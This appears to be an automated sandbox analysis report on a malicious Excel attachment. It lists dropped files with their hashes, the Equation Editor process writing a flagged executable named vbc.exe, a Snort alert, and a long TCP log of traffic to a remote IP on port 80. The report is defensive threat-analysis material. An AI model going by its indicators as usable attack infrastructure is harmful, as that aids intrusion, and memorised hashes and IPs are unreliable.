                                        Preview: .. 2.e...qC)....X.....5..#].<u5... ..`*|,q.m.D.m.J..d.u#.!N.|?..ML...t..]>....)..L.Z.t...._..g.!Q........|........CD.;..K...J.x.Bv%\....*...s.9.z.Z. ).i...aO..F2.cP].$....5..t>v..R.p.^..=.....gP.9..].`...........b...H#...q.v.....I..#.....u.r./d..Lv.f..e...J......,...G..-U(.R..>/.e. ..`*|.q.+.D.m.J..d.u#.!..|..unL..Q.y+..{...^b....-0e|4.;...:!.....{..Xl^.L...O!.D.;..K.q...^Y{......T..fICB..Z]...N....>...../..>.F..5..t>v..j..^..\......H....].`...c. .B..A.X..H#...q....TI..i.....u.../dD.L.....e...J9.....,...G`.-U(.R..u5... ..`*|,q.m.D.m.J..d.u#.!..|..unL..Q.y+..{...^b....-0e|4.;...:!.....{..Xl^.L...O!.D.;..K.q...^Y{......T..fICB..Z]...N....>...../..>.F..5..t>v..R.p.^.X........Q....].`...c. .B....X..H#...q....TI..i.....u.../dD.L.....e...J9.....,...G`.-U(.R..u5... ..`*|,q.m.D.m.J..d.u#.!..|..unL..Q.y+..{...^b....-0e|4.;...:!.....{..Xl^.L...O!.D.;..K.q...^Y{......T..fICB..Z]...N....>...../..>.F..5..t>v..R.p.^.X........Q....].`...c. .B....X..H#...q.
                                        C:\Users\user\AppData\Local\Temp\~DF6B82F0CFA0E9C1FD.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFB1A16108E122F889.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFEAB75EE5AC992C85.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DFFDD773F6984E1177.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:CDFV2 Encrypted
                                        Category:dropped
                                        Size (bytes):234408
                                        Entropy (8bit):7.970302671615709
                                        Encrypted:false
                                        SSDEEP:3072:hOEg6uY3Uvbl5/SoXWBke9ZRS3gjk5p3JttrLzUT5x65QlxdSrf552fnh6cvrGWh:+aEx5qoXHeBTjw3J7mx65Q/dCfnknUQ
                                        MD5:BC2D171F6EA23A58CE5CCA820869295C
                                        SHA1:DAFD3A3276C12EE6D20206573D65D6FB10E6AF7B
                                        SHA-256:408C41F67CC40208F1518B050DB8B6D0F315DAE817E26C5AE43EFE917506C226
                                        SHA-512:F46D62B6CD47184DB12BD302DEF63E945063E471BBAB3F02483C9C66C83D751E65C97D3F4F4D1D5F4D08BAD1E1FD3BB882F97A85F363945A1659913CE47077B3
                                        Malicious:false
                                        Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        C:\Users\user\Desktop\~$New order - C.S.I No. 04183.xlsx
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:true
                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        C:\Users\Public\vbc.exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):475934
                                        Entropy (8bit):6.263679071719373
                                        Encrypted:false
                                        SSDEEP:6144:2Gi2L3NWrOG5s3ytYBz5Sy/M3L+uM4jMzfWO/j4zR03bze/XOpSmREM3:hUb5krzwR3LIfL4zq3baOEEz3
                                        MD5:4D1B51FE258BE32D346B3507ABEDDCB3
                                        SHA1:977A34967B0B42A19969DD1106EF74439D306DCE
                                        SHA-256:0C6D57557120DECEDC9A102794EA95BCAF64529EB1F18058E4DF62C34B724988
                                        SHA-512:27330F64606CFEBBE834E2D419E5F34207C1BFBBAE22DA52763C8FE8E48A001D52E2C5AB1B93EE9CFD2E5B4DF02C09628F82BE2CD5D340CA0711C004AED1EC12
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@.......................... ...............................................t.......p..p............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc...p....p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:CDFV2 Encrypted
                                        Entropy (8bit):7.970302671615709
                                        TrID:
                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                        File name:New order - C.S.I No. 04183.xlsx
                                        File size:234408
                                        MD5:bc2d171f6ea23a58ce5cca820869295c
                                        SHA1:dafd3a3276c12ee6d20206573d65d6fb10e6af7b
                                        SHA256:408c41f67cc40208f1518b050db8b6d0f315dae817e26c5ae43efe917506c226
                                        SHA512:f46d62b6cd47184db12bd302def63e945063e471bbab3f02483c9c66c83d751e65c97d3f4f4d1d5f4d08bad1e1fd3bb882f97a85f363945a1659913ce47077b3
                                        SSDEEP:3072:hOEg6uY3Uvbl5/SoXWBke9ZRS3gjk5p3JttrLzUT5x65QlxdSrf552fnh6cvrGWh:+aEx5qoXHeBTjw3J7mx65Q/dCfnknUQ
                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                        File Icon

                                        Icon Hash:e4e2aa8aa4b4bcb4

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        11/25/21-19:25:03.131291TCP1201ATTACK-RESPONSES 403 Forbidden804916834.246.239.131192.168.2.22

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 25, 2021 19:23:22.940810919 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.232038021 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.232304096 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.232670069 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.525060892 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.525137901 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.525178909 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.525193930 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.525213003 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.525247097 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.525254011 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.525326014 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.816823959 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.816953897 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.817127943 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.817179918 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.817406893 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.817466021 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.817501068 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.817522049 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.817536116 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.817578077 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.817591906 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.817629099 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.817631960 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.817687988 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:23.817703962 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:23.817756891 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109147072 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109220028 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109247923 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109282970 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109410048 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109457016 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109469891 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109514952 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109541893 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109595060 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109601021 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109631062 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109657049 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109687090 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109693050 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109720945 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109747887 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109778881 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109781027 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109817982 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109855890 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109874010 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109895945 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109929085 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.109935999 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109970093 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.109986067 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.110014915 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.110030890 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.110085011 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.110095024 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.110146999 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.114377975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.401451111 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.401520014 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.401746988 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.403350115 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403399944 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403429985 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403460979 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403501987 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403539896 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403575897 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403614998 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403654099 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403690100 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403728008 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403765917 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403801918 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403841972 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403881073 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403919935 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403958082 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.403994083 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404031992 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404068947 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404104948 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404143095 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404180050 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404218912 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404257059 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404292107 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404330015 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404367924 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404403925 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404442072 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.404748917 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.406588078 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696214914 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696278095 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696316004 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696316004 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696340084 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696357012 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696369886 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696399927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696518898 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696558952 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696563959 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696597099 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696600914 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696634054 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696665049 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696696043 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696734905 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696760893 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696772099 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696777105 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696810007 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696815014 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696860075 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696873903 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696918964 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.696959972 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.696996927 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697005987 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697035074 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697045088 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697073936 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697088957 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697110891 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697113037 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697149038 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697154999 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697189093 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697196007 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697226048 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697231054 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697263956 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697267056 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697302103 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697309017 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697343111 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697365999 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697381973 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697391987 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697417974 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697455883 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697457075 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697459936 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697494030 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697498083 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697530031 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697535038 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697567940 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697571039 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697604895 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697612047 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697644949 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697658062 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697684050 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697688103 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697720051 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697729111 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697758913 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697760105 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697798014 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697803020 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697834015 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.697845936 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.697875977 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.701581001 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.988145113 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.988203049 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.988226891 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.988240004 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.988245964 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.988280058 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.988285065 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.988323927 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989027977 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989069939 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989111900 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989550114 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989590883 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989603043 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989628077 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989628077 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989667892 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989676952 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989706039 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989715099 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989742994 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989752054 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989782095 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989788055 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989820957 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989833117 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989855051 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989857912 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989897966 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989902973 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989938021 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989947081 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.989974022 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.989983082 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.990017891 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.992316008 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.992512941 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.992561102 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993403912 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993444920 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993451118 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993484020 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993485928 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993520021 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993530035 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993558884 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993566036 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993597984 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993608952 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993637085 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993647099 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993675947 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993678093 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993711948 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993715048 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993751049 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993751049 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993789911 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993791103 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993822098 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993825912 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993864059 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993865013 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993904114 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993906975 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993942976 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993944883 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.993982077 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.993983984 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994018078 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994020939 CET4916580192.168.2.22103.171.1.140
                                        Nov 25, 2021 19:23:24.994055986 CET8049165103.171.1.140192.168.2.22
                                        Nov 25, 2021 19:23:24.994060993 CET4916580192.168.2.22103.171.1.140
